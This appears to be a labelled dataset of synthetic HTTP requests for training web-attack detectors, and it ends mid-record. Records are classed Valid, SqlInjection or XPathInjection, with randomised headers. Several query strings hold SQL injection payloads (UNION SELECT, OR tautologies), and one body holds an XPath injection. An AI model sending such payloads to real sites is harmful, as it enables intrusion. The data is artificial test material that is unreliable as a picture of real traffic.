From: 7nltc3@Coemng.gov
If-Modified-Since: Sat, 06 Jan 07 15:57:27 GMT
If-Unmodified-Since: Wed, 05 Aug 09 03:58:36 CET
If-Match: "dUaUfWxbWDyaffIRTMSS"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.3
Pragma: nencsa4=1ehe
Proxy-Authorization: soee ySvnmah=esxs
Authorization: Basic b3NkZWRIZU86ZXR1ZDY=
Range: -914608,-7
Referer: /ftensm/resrt/ihbauChs.txt
TE: trailers
Trailer: Trailer
User-Agent: fgeLdi1ye (q4T6s65H_S)
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 7.8 245.4.251.64
Transfer-Encoding: compress
Upgrade: gtg0xo/8.7, tfaT0/5.4, nsriou/5.3, teo/3.6, tde0w5/0.2
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 208.34.96.72
X-Serial-Number: 14852095010495286519
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8759
Start - Id: 48552
class: XPathInjection
POST /egnuoaaTnitOSNl0/6.mznObi4Cw/hlwPJ96v/em/ow966/tpIbRPgqc5mH.mdb? HTTP/1.0
Content-Length: 135
Content-Language: ieyondg
Content-Encoding: identity
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: SXJlZVpnc2ZlZnRlZU56Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Feb 06 18:27:43 CET
Last-Modified: Sat, 30 Apr 05 24:25:06 GMT
Host: 57.92.114.210:80
Connection: close
Accept: application/*;q=0.8, video/*, audio/*;q=0.0
Accept-Charset: iso-8859-9;q=0.1, us-ascii;q=0.6
Accept-Encoding: 
Accept-Language: swvs-miat, norlrdeA-nectqsp, ciSty-nkb, 7-ve8mFmr;q=0.1, oahtIh7b-ueci;q=0.7
Cache-Control: min-fresh=87
Client-ip: 102.113.223.214
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="96"
Date: Wed, 20 Jun 07 16:55:34 CET
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Thu, 03 Jul 08 24:41:32 CET
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: "fSYY-HRGuP_x8tQs"
If-Range: Sun, 01 Jul 07 11:02:42 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 31644-283996
Referer: http://www.nmw2s.biz/t9oeeu/eteemq7/hdrem/Moot.conf
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: aedortyc2lietirife
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: HTTP/5.0 204.218.167.176, 6.3 www.ig96red.tiff, 3.8 www.lesWj.js
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UMJNXE=Ihi&aeeeaatar=8tndNzhaheE&0m28jv5Aj=7&u25S=8909  or o/r8t/ne/child::node()[position()=855]    or  235=

End - Id: 48552
Start - Id: 26129
class: Valid
GET /tthtehe/85crtOIBfXHQA-c/eNo9enjnesu/_9rmsvJUrwindow.openVWR_X.cfm?sFl4odaeehs=iehn&wble=0496592017&mthdcmysenee=hthgc&JAY4e7U=0706169&eilyse=+41&Njxq=eTisueyteopen&elaaaFne=o9iol%2625%29n%5CandANtoeiframecb&h5=chhs&lztxhugfeno1otb=%7Eaa&TGQ0jUv=cjVG0mhKg4y-&eeaaoe6ltet=me&siith=uc+nsgrfzti9%3Cqj&nuau5co=38777234&em2a=a39%3Ba HTTP/1.0
Host: 65.184.13.222
Connection: keep-alive
Accept: image/jpeg, video/quicktime, image/*
Accept-Charset: *
Accept-Encoding: identity, identity, deflate, deflate, deflate;q=0.0
Accept-Language: *
Cache-Control: aofne=uqiodeg
Client-ip: 17.252.225.48
Cookie: nl=N?hj;yyttiSi=erennuzieoetr9e;eht3vserLddtioo=inagosett
Cookie2: $Version="23"
Date: Thu, 29 Jan 04 15:05:33 UTC
ETag: W/"ZYw7JRc.kCOTo_1"
Expect: tSohed6m
From: xeno@faL1.st
If-Modified-Since: Mon, 19 Jan 04 23:40:49 GMT
If-Unmodified-Since: Thu, 20 Jul 06 17:31:02 CET
If-Match: "4pOCPm.w6f.xD8v7D"
If-None-Match: "QA6lFv-ZvwWc2JZs"
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 620
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXN0MmVvbjBzdGlhbGwxbWNvQTUybmVsSWVlNWx0ZWllZWlWYWFsbnNicG8=
Authorization: NTLM cnR3Z2xvd2N0T241ZWxhYWNUZWVubmlvdGF0dGlpdWczbHVoZXRn
Range: -076,520453-4710
Referer: http://www.rnuaehqt.com/sToe5k/n7t6t/NSm3/ceoAnie.htm
TE: trailers,trailers
Trailer: Warning
User-Agent: iiNir0ecte/6.7.5.6.1
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 886x233
Via: 4.9 www.qpiawasO.htm:4644, 0.8 245.53.218.221
Transfer-Encoding: hsfo
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 6736217
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26129
Start - Id: 42567
class: SqlInjection
GET /evalNNsP9nbXkJP/nTcvWt/axu/beTo6tsfre9eah1y.htm?tcaei=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F65%2F**%2FFROM%2F**%2Ft2d%2F**%2FWHERE%2F**%2F%28++++%27%27%3D+%27++%2F**%2F HTTP/1.1
Host: 134.215.0.59
Connection: close
Accept: text/*;q=0.8, image/jpeg
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.7, gzip;q=0.2, compress, deflate;q=0.5
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 58.68.40.65
Cookie: D9=291596721;3n.Gpgx6aK=sjc
Cookie2: $Version="57"
Date: Tue, 07 Apr 09 21:23:00 GMT
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Thu, 10 Jan 08 06:44:02 GMT
If-Unmodified-Since: Wed, 15 Jun 05 19:14:44 GMT
If-Match: "ko-up2h_R5he46_b"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: feet elTus=lwzomle
Range: -05,8037-,228664-
Referer: http://www.2ssou.org/Ny3medm/eeo9t/scostmHo.txt
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: r7Ne0lTtetoei
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 161x8196
Via: FTP/1.6 119.136.0.101
Transfer-Encoding: gzip
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42567
Start - Id: 8983
class: Valid
GET /rmfrC/rtnwuietE25Nrule/ezeodvayyNTTeei/ohiir2a/tZucrlbsuljpO-/yaqtqnosah3r/i2obqN/oOJnj4faW/ceiDear6oe80alhaxe/-link.css?akr3Uccgc=Aigi&ilfd=2792&htpassDAwNyVT@E=6%3Eausrhhltcrus&oc0sapesi=eca%22&i8Vo31K7zlsN2=eLiaoelmarlZBse&Oren0eke=yw%5Dt-r2%3E+igvioconnectrh&zw=2006&h6=dPrT3KzOJg HTTP/1.1
Host: 188.46.21.235
Connection: keep-alive
Accept: application/postscript, audio/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: c0=ieesfdSa
Client-ip: 69.26.62.63
Cookie: veut=Z/
Cookie2: $Version="64"
Date: Fri, 24 Jun 05 01:53:13 CET
ETag: W/"qHJ8V726aH1Wnko2j"
Expect: 100-continue
From: etedlri@oanesz.de
If-Modified-Since: Thu, 21 Jan 10 14:30:50 CET
If-Unmodified-Since: Thu, 24 May 07 09:31:52 UTC
If-Match: "mXfzT-lDnQqQe5wL2q"
If-None-Match: *
If-Range: *
Max-Forwards: 8113
MIME-Version: 5.3
Pragma: ftEls='vekiar6'
Proxy-Authorization: NTLM aVNlaG5pMHVsMWlldWVzdGRsb2F2Y290SkNlc3RTNGVUcm8zOGk3bWlob1dBcg==
Authorization: Digest algorithm=xfrrw2p
Range: 392737-
Referer: /bedWtOe5.cgi
TE: trailers
Trailer: Trailer
User-Agent: talt (ik7NTn5SQV; eAfR2.w2C; pcO30mPb; uVfecV)
UA-CPU: 68000
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7350x9086
Via: 4.4 www.ttado.png:873, FTP/5.7 193.90.107.116
Transfer-Encoding: gzip
Upgrade: acE/5.6, p1t/4.0, nae/0.1, xpcsn/9.0, aeaat/1.8
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 92954758156
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8983
Start - Id: 35282
class: SqlInjection
GET /dluo2oTyeaeAtpe/OlereEh/mTecA7b6sNuNcrd/rucehroayosTOTt9t/tt62naeiNstbgnm/4F0xp0PDpositiono/ooteataeu/gUhC2/ro5QWG12Wj0iB9enVyC/wZI2I@S0dp68.jpeg?00xHtEs=oiNgqaurlslhan&gjasan=o14&jvga1oagsDtsime=%27++OR+++%27Uhpyonicsett%27+++++LIKE++%27aze%2525 HTTP/1.0
Host: 206.247.17.138
Connection: Ndfeos9n
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: udwraion-vheernh, tttwejo-b;q=0.7
Cache-Control: max-age=03305
Client-ip: 155.132.155.102
Cookie: rwmipolhehdPa=aei;295h7d=ihgee;oiceiurnssge=ah>eee>ehd/tl;omaaaletrh=hin3h
Cookie2: $Version="2"
Date: Sun, 14 Nov 04 22:10:01 UTC
ETag: W/"MeA2g_N_dUPfr6kUO"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: g1swIsn@rorentof.uk
If-Modified-Since: Sat, 07 Aug 04 01:41:11 GMT
If-Unmodified-Since: Thu, 14 Apr 05 21:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 19:09:52 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ptUn=nl
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: /9wm2ae/gmevdoln/veL9ds/ztnqeF.exe
TE: trailers
Trailer: Proxy-Authorization
User-Agent: aHooot8tjg/7.4.4.6.5
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 827x876
Via: 2.1 www.meer.htm:6285, 4.4 www.ilut.tiff, 2.0 29.69.203.166
Transfer-Encoding: compress
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35282
Start - Id: 7837
class: Valid
PUT /trdspbRe2Retgsf/GGxTEK@RacceptWQ/u.4bC/90EF1FXiYJ/hK/41-/0heejkzn4ieoksibron/mv4kxbL.c6.NWENFT/iRWToVaInz1/nA4qEQr/nYaT4gcZ.s/Lehr1.bin? HTTP/1.0
Content-Length: 212
Content-Language: 5mkDs,rlA
Content-Encoding: deflate
Content-Location: /uo0woa/ceewotoe.jsp
Content-MD5: YWFvb0d0b25zY2NUYXV0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Mar 10 23:56:34 GMT
Last-Modified: Wed, 03 Mar 10 24:30:32 GMT
Host: 254.24.154.78
Connection: yowvdar
Accept: */*;q=0.3
Accept-Charset: euc-tw;q=0.8, windows-1255
Accept-Encoding: identity;q=0.8, compress, gzip
Accept-Language: lyePf-he;q=0.7, rsbE-tldrr7nR, ew-ckvesta
Cache-Control: only-if-cached
Client-ip: 214.211.221.67
Cookie: a0eeniistlrlq=ahttps9i;D0Waosprocessing-instruction-V=fromdoibjes-w'bt;etcvgroup by_@L_7== w'nidfgmc3uce;abcuy=e]hfo';kaaU=271177
Cookie2: $Version="2"
Date: Thu, 26 Feb 09 01:09:54 UTC
ETag: "YJMLf2aKljNfJ5L"
Expect: nydcsr=alRan;tgso0ehc=ixLrttre
From: wkquS@sigs.st
If-Modified-Since: Sat, 25 Mar 06 03:51:59 UTC
If-Unmodified-Since: Sun, 24 Feb 08 11:37:21 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Feb 04 03:16:52 CET
Max-Forwards: 5768
MIME-Version: 6.1
Pragma: aott=lH
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: Digest qop=auth-int
Range: -087385,-4,-711
Referer: /u3x0ieh8.pl
TE: trailers,trailers
Trailer: Pragma
User-Agent: 5b7VfZJa http://www.ozqh.cz
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 669x1617
Via: HTTP/9.6 181.177.157.53:9465
Transfer-Encoding: compress
Upgrade: w0iis/1.6, 8shs/1.6, usqJwb/8.9, ass/1.7, nra/8.5
Warning: 713 39.50.39.133 "niebsbmiarSc9ytx7u" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 660220011832076689
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cctdue=iep(yidocumentfvokHd\>o&ry=12620629&rhraees=t-0eval/&xvcnd=uiahK&co0n=sR5Lo8_hqg&4N4-qmailNq=68&84tdieiase0=et &tgssocisas=binpq Esar&@VgZQg=gO_fp&Nbfs9l8tiiejt1=I8ia&l7jFHG27=133&rBBd.h7IYjf.=w se

End - Id: 7837
Start - Id: 35248
class: SqlInjection
GET /ketle/hN-jIKT_l/yT/GlEMh.exe?xatttIliaWrrnar=ea%2B&imcta=7202429087&eikohgn=28&onoke6ronlolnp=eatdincludeaciis&eluzawdp0=sJJbXFR&udtrt8e3tbojpu=tKdXtpco&nbTea7=324&eMSyhsiXhicwrmm=Cexnautoexec&GeeUsaihp9=ejfxyEJI&itfnl=786092468&execgbusra.RG=47&pSsih93hu=sAMBnRO&CoPGl1hFT6=e9u2kqIu&qkswK=%27+++OR+++%27kyj%27+++%3E++++%27S HTTP/1.0
Host: www.esctn4yki2.fr
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=72
Client-ip: 150.203.233.233
Cookie: XSoMlEMNhc=69581;t2ernodltuout=hs;hsahinnrmpni=3660228295
Cookie2: $Version="9"
Date: Wed, 14 Oct 09 09:37:19 GMT
ETag: "uT847SjOiACrZoY"
Expect: 100-continue
From: yypu@9nadiOxX.st
If-Modified-Since: Wed, 30 Apr 08 15:57:24 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "@EliaMfR4Js8iSZ"
If-Range: "jW@Rm9CmGNHcSfF"
Max-Forwards: 0
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM QTllc3RURWF0cm9zaWVlcmRyZXd1aWx0ZXJ0NEk2UTByaXhsSGFlZXJnZWlzb3Q=
Range: 686-87074
Referer: /ntzsa/kutxyOn.jpeg
TE: gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/8.5 (X11; U; Unix 3.5; 3h-5i; rv:6.9.1) Gecko/74410392
UA-CPU: 68000
UA-Disp: 052,8339,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: 4.7 www.uNsdb.png, 9.8 133.107.43.188, 3.6 248.246.140.82
Transfer-Encoding: compress
Upgrade: Eot/0.6, Efs/4.3
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35248
Start - Id: 29449
class: Valid
GET /slanednwmoF/hasgItssanmeia4z/vZtYyUd.updatemTKc/execid54/rb@Zf8kxQcRyHtpWA/iesmiyaghksiyt83/tm/4j.html?etrs5rh=00&AqROR=22751&yreamt=ya&rkymzjn=049769&Oderayadrht=nEeohz8utsmame&uCUb@=48422 HTTP/1.1
Host: www.lkrssnoe.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.9, gzip, gzip, gzip;q=0.6, identity
Accept-Language: rfotud-tydhbite;q=0.5, reH-pabefhb;q=0.1, cnxae-to3
Cache-Control: no-transform
Client-ip: 72.151.165.169
Cookie: ienpcrf5TsiohuU=etfdrcp;tn=tya0ht0;fUhvg=betweenwe;iadtiee=oWXZ;Ia=e9N;UeHnnfcocdttie=tcL9LmcK8jfa
Cookie2: $Version="9"
Date: Tue, 31 Mar 09 22:41:47 UTC
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: moneAdh@fg3imxt.net
If-Modified-Since: Thu, 15 Apr 04 02:48:38 CET
If-Unmodified-Since: Fri, 08 Feb 08 08:51:46 CET
If-Match: *
If-None-Match: "CsIGEHBSUcQQTRPVw"
If-Range: "EE1gOQq9@YM.RVa"
Max-Forwards: 505
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM dVlWbHNnQXJydElwd2JzOU1zQmU2dGRpdTlJcHJyOW4=
Authorization: Digest nc=445BEEbc
Range: 6527-0267
Referer: /sd6zu5.pl
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 5.8; ls-2v; rv:7.5.0) Gecko/97568990
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6889x7208
Via: FTP/1.0 246.96.191.135:82, 7.0 www.lnec.gif
Transfer-Encoding: identity
Upgrade: motr/5.8, tavtH/0.5, 3eeyua/8.2, dC8c/3.4
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29449
Start - Id: 26975
class: Valid
GET /tvr5A2ahj.lcVArdMT/2iY.bKixNiicK/6VqBtKnpDg/eXRTMyv.zQJv/sHn9shnluna7jSioeiv/N4ai/loriser/Y2ratleltehaiourrm/5oorkqmowetEEoethej/0ste5h.cgi?d4e9setcetrke=jih&hXprocessing-instructionnc=zTkintlht1x5o&rtNlgaub9=99431&se2nulnt=bt2iimg3ro5T&Nsx8s=aeelt&rdsMNabme=e&aetmesrc=ac&ASj=trFds&d4aiyzerAdPee2i=k&IeRtt0siW=7007201 HTTP/1.1
Host: 145.200.232.107
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.8, image/*;q=0.1
Accept-Charset: windows-1253, x-mac-hebrew;q=0.5
Accept-Encoding: 
Accept-Language: l8esm-httaonej;q=0.2
Cache-Control: no-store
Client-ip: 128.148.23.146
Cookie: jttofeUd8l=qo(and ;eeynapdraat=ecjoa61o24gha6sc
Cookie2: $Version="66"
Date: Tue, 23 Sep 08 09:41:08 CET
ETag: W/"ZRNduEirGmna_BUVr"
Expect: 100-continue
From: pt2a@ekdd.it
If-Modified-Since: Mon, 22 Feb 10 13:58:41 GMT
If-Unmodified-Since: Sun, 09 Oct 05 16:56:23 GMT
If-Match: "fzYkou.79HUaS46@"
If-None-Match: "nbx0Bx.F7VEQ4J1vGq"
If-Range: *
Max-Forwards: 13
MIME-Version: 5.9
Pragma: ete=nshshhk3
Proxy-Authorization: Basic MmlUaTpnZWUwZA==
Authorization: Digest algorithm=MD5
Range: 387-4202,-8956
Referer: http://eji3ReeS.ch/7etm8lo/ldae6d/esjlsxn/drws1/eaetrse.pdf
TE: gzip;q=0.6,trailers,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: qine/2.8.1
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6546x3443
Via: tsi1he/9.6 27.11.66.90
Transfer-Encoding: compress
Upgrade: caeth/1.6, lnOnre/5.4, bKelfr/1.3
Warning: 634 119.210.230.98 "Etrefi" "Thu, 26 Oct 06 17:47:14 CET"
X-Forwarded-For: 84.0.101.178
X-Serial-Number: 781010344531
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26975
Start - Id: 3868
class: Valid
PUT /uUens0/5Lk/woudivF.eDPz-Z8/ebvbct/ijxiAA4OFLQnCT/EtPcmrexu07cymo2es.tiff? HTTP/1.0
Content-Length: 187
Content-Language: drose,efe,UnsOjd9
Content-Encoding: identity
Content-Location: http://www.Yetjha.org/1sgfiltd/case/KeotE/1ttrtaa/WisRtt.sh
Content-MD5: czdzb24yazdlYUVuSHN4cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 08:02:25 GMT
Last-Modified: Fri, 02 Oct 09 07:41:57 UTC
Host: 194.191.1.200
Connection: dwce
Accept: */*;q=0.8
Accept-Charset: utf-8;q=0.0, hz-gb-2312;q=0.6, x-mac-ce, utf-7;q=0.7, iso-8859-5
Accept-Encoding: 
Accept-Language: nq-ahu03n;q=0.1, hecmrpd-rshtex2;q=0.0, hte7orb-i;q=0.9
Cache-Control: no-transform
Client-ip: 127.179.20.25
Cookie: mnetcatRZ.L=136715791;anto=7winntl;uethus=702540;tnr=atlfiLscatocioW5m
Cookie2: $Version="511"
Date: Fri, 24 Oct 08 09:36:59 UTC
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Mon, 06 Oct 08 12:29:25 GMT
If-Unmodified-Since: Wed, 28 Dec 05 09:35:58 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Sep 08 06:19:39 GMT
Max-Forwards: 87
MIME-Version: 1.4
Pragma: c6omshn=aB
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: NTLM ZUFIa3JjcnRpZW5VZXU4aXNPOWhubzd0bGVvZ28xYWVoZGVo
Range: 459294-700,2-,-859
Referer: http://www.rimF.st/wircm/eroac.tar
TE: deflate;q=0.3,deflate,chunked;q=0.7
Trailer: User-Agent
User-Agent: trosr (4DM489gk; oT@SszLNWN; swuD336O)
UA-Disp: 170,019,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6146x097
Via: FTP/4.8 www.seh1TBRa.html
Transfer-Encoding: gzip
Upgrade: 1dd/5.6
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 25.247.174.254
X-Serial-Number: 537380175884943310
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

tn4st=3195035&4teomcne7i3=fromconnect&ons=82047356&ee=iIktezchild=63tTir?ty8lw&neaisrteih=\i4&nMtleiag4sto=ypzfEnc4qm e-a&apec=Eeo&Intia=y9es5jreseae&aV-h=lkt&BschtpassEIMEG-4=90640

End - Id: 3868
Start - Id: 30196
class: Valid
GET /qtcta7emt/dnI6J3B9wG/ua0xLGMnerz5pcAj.0/fsbEffDaH/pcAqshettey/1j4476zYYP/B8TiKfVHX.jpg?eopentBWIemZnsY=dksock_stream0eAechor&Atstap5B=gw2fananDhe6reh&SnisIeysn=hRtt5iri&@4_i1F4bgsoundstyle=0203&OtgreEwrl=a6eatthftceB4Ae3e&saRrH=2AamXO&ie=cBby HTTP/1.0
Host: www.jiEn.ch
Connection: close
Accept: image/*, image/*, video/quicktime
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 52.71.28.255
Cookie: AjL_=;esdiv;8eSknegameq=0
Cookie2: $Version="25"
Date: Fri, 07 Dec 07 24:12:01 CET
ETag: W/"cxq2qJsQECsfzqrbt0"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Wed, 03 Oct 07 09:37:25 UTC
If-Unmodified-Since: Sat, 12 May 07 19:41:08 GMT
If-Match: "zD-Lcn0gcl2JEA."
If-None-Match: "JqIA13RmFLVCRFV57Ep"
If-Range: "FzBQQdy6scR_8Oqjg"
Max-Forwards: 4217
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bWVmT2lpemk6bm5lZWNlM3g=
Range: 8-
Referer: http://nAtrs6n.it/nNgnrbhh/Ieooi/tu10t/rleen0nh.css
TE: gzip,gzip
Trailer: Authorization
User-Agent: fg6LhGDrnf http://www.stBtset.be
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 035x8386
Via: 8.4 www.eehsl4le.js:04, o3tl/3.7 www.Mwfhsau.jpg:9
Transfer-Encoding: identity
Upgrade: tz8s/1.1, eta/2.9, ypera/7.0, v8r/7.9, hNu/3.8
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30196
Start - Id: 14110
class: Valid
GET /d@objectIl2Mxcux/Wlib5RHziQoHmochaH5Q/sHs_oC4f1pvEekdssT.css?ssfntwAhS=sE+R&5maeiy=dID5IwBw4uOS&9jk6eaettlytcet=629 HTTP/1.1
Host: 172.57.170.143
Connection: close
Accept: application/*, video/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: htepka5R=hs
Client-ip: 250.248.98.251
Cookie: ll=aelwtjyji;csthdoaToAou4d=wcir;t3ubNf6v@=t7Tesen650;eoadoiwzI8=29;cosoy77ttrdlEt=1xr;8Em=timsi
Cookie2: $Version="6"
Date: Sun, 28 Nov 04 24:28:39 GMT
ETag: "JuLac0eqC4zNEId"
Expect: sK3n=wyein
From: gqfl6@xdoSp.uk
If-Modified-Since: Fri, 30 Jun 06 24:58:10 UTC
If-Unmodified-Since: Sun, 07 Jun 09 20:51:35 GMT
If-Match: "bUKWX@us4RFtSc4q"
If-None-Match: *
If-Range: *
Max-Forwards: 965
MIME-Version: 5.8
Pragma: oh=e8lurh
Proxy-Authorization: NTLM Y0FhbmpyZXN5ZWFuYWxzZWV0bmtsNHJlc29hd3J0OW5lcnJlZ2Q1aG9sbmw4dGE=
Authorization: NTLM bWVzdTdsb2cwaW91OHVkb2R0bXJhaGVhYXRzSHQwaGh1dFRxdHM2bXNkdXN6cg==
Range: -445,968337-8
Referer: http://www.ege76.org/ghueosMk/gmn1qst/BeouEd/tMIda/l7thr.pdf
TE: trailers
Trailer: Connection
User-Agent: Rxnoro/2.7.5.5
UA-CPU: Sparc
UA-Disp: 8924,5533,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 454x057
Via: 4.8 www.njtnnwte.shtml, HTTP/1.5 85.236.217.62
Transfer-Encoding: tei0r
Upgrade: yrp0/0.5, e40es/7.1
Warning: 086 www.tdkos.css "uisvnesrhn5pye" "Mon, 27 Dec 04 14:53:29 UTC"
X-Forwarded-For: 192.192.53.173
X-Serial-Number: 6453522338858945
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14110
Start - Id: 7126
class: Valid
PUT /navwSGB52jac6_/hY9jNMmsyY3g.shtml? HTTP/1.1
Content-Length: 82
Content-Language: dIcS9nce,qAsao
Content-Encoding: compress
Content-Location: /iApwsz/lntRuT/iiaeaHtI/tdmeni4e.tiff
Content-MD5: eWRubnduZGV0bXVqZG8xcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Sep 07 04:55:10 UTC
Last-Modified: Wed, 14 Nov 07 10:21:30 CET
Host: 151.191.160.245:923
Connection: htottn
Accept: */*
